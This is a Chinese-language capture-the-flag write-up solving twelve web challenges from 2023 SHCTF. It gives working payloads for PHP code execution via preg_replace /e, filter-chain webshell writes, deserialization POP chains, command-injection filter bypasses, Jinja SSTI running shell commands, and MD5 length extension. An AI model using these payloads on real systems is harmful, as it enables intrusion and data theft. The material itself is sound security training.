2023SHCTF web方向wp

1.ezphp

看一眼，你大爷，啥玩意都给我过滤完了。

还好下面有preg_replace()/e，会把replacement当作php语句执行

传参pattern=.*， .*表示任意字符，code={${phpinfo()}} ，为什么这样写，因为,'print_r("\\1")'，如果直接传phpinfo()，会被当作字符串对待，而php中{}里面的变量会被解析，这样就能执行phpinfo()，本来一直尝试文件读取，结果flag就在phpinfo里面。

2.sseerriiaalliizzee

用伪协议

php://filter/string.strip_tags|convert.base64-decode/resource=6.php

<?php @eval(system('cat /flag'));?>进行 base64编码然后拼接到后面

payload：

<?phpclass Start{public $barking;public function __toString(){return $this->barking->dosomething();}}class CTF{public $part1="php://filter/string.strip_tags|convert.base64-decode/resource=6.php";public $part2='IDw/cGhwIEBldmFsKHN5c3RlbSgnY2F0IC9mbGFnJykpOz8+';public function dosomething(){$useless   = '<?php die("+Genshin Impact Start!+");?>';$useful= $useless. $this->part2;file_put_contents($this-> part1,$useful);}}class Flag{public function dosomething(){include('./flag.php');return "barking for fun!";}}$a=new Start;$a->barking=new CTF;echo serialize($a);

3.md5的事就拜托了

这题考的是md5长度拓展攻击。

parse_url()函数：是 PHP 内置函数之一，用于解析 URL 字符串，将其拆分为不同的组成部分，可以获取协议、主机名、端口号、路径、查询参数等信息。

构造SHCTF，让回显flag的md5值

SHCTF=host://SHCTF:pass@user/path?args=value#anch

md5值为 c3ef7d5c6edf7d0495b0d8b92fe3241a

然后构造length输出flag 长度，用小数绕过intval

长度为42，下面是关键部分

把$num urldecode之后拼接在flag后面md5加密，然后要与POST的SHCTF相等

这里考察md5长度拓展攻击，用工具

获得flag flag{f92d1d13-0947-4212-bf78-269c400606a0}

4.babyrce

简单的绕过正则匹配,\拼接，$IFS绕过空格

payload:rce=ca\t$IFS/f\lag

5.ezphp

num不能有数字但是得通过intval()，这里用数组绕过?num[]=1

下面一个绕过，需要code里面有SHCTF，但是SHCTF前面又不能有东西，这里用回溯绕过

脚本

import  requests
data={"c_ode":'2023'*260000+'SHCTF'}
url='http://112.6.51.212:30302/?num[]=1'
res=requests.post(url=url,data=data,allow_redirects=False)
print(res.text)

6.ez_serialize

简单的反序列化pop链

_wakeup->_tostring->__get->invoke

payload：

$a=new B;
$a->q=new C;
$a->q->z=new D;
$a->q->z->p=new A;
$a->q->z->p->var_1='php://filter/read=convert.base64-encode/resource=flag.php';
echo serialize($a);

7.登录就给flag

用bp爆破一下就得到密码password，直接登录

8.生成你的邀请函吧

用postman发送json请求

9.serialize

正常的pop链，注意一下php序列化里面的指针用法，把$gao的地址写到$a上

__wakeup->__get->__tostring

注意序列化字符串不能以O：开头，所以我们序列化的时候转化成数组再序列化就可以绕过了

payload：

<?php
class misca{public $gao;public $fei;public $a;
}
class musca{public $ding;public $dong;}
class milaoshu{public $v;}
$a=new musca;
$a->ding=new misca;
$a->ding->a='aa';
$a->ding->gao=&$a->ding->a;
$a->ding->fei=new milaoshu;
$a->ding->fei->v='php://filter/read=convert.base64-encode/resource=flag.php';
echo serialize(array($a));

10.no_wake_up

依然是反序列化，目的绕过__wakeup。

属性个数与实际属性个数不同就会绕过__wakeup。

payload

<?php
class flag{public $username='admin';public $code='php://filter/read=convert.base64-encode/resource=flag.php';public function __wakeup(){$this->username = "guest";}public function __destruct(){if($this->username = "admin"){include($this->code);}}
}
$a=new flag;
echo serialize($a);
序列化得到
O:4:"flag":2:{s:8:"username";s:5:"admin";s:4:"code";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
把2改为3得到flag

11.ez_ssti

ssti注入，hello后面应该跟的是名字，盲猜参数名是name

很成功，开始构造语句

payload：

?name={{%27%27.__class__.__base__.__subclasses__()[132].__init__.__globals__[%27popen%27](%27cat /flag%27).read()}}

没有任何过滤

12.EasyCMS

后台扫描得到登录地址/admin/admin.php

默认用户名admin 密码tao

这里存在任意文件读取漏洞，可以读取到根目录的flag文件